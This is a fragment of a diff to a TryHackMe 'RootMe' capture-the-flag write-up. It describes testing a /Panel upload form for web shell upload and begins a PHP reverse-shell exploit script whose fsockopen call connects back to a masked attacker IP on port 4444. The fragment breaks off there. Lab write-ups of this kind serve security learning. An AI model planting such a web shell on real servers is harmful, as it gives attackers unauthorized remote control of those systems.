DreHenri/tryhackme/CTFs/RootMe.md

 ## 5. Exploitation

-    On Panel there is an upload option.
+   On /Panel there is an upload option to test if it is possible to upload a web shell.

    Exploit script:
 ```
 <?php
 $sock=fsockopen("10.21.***.***",4444);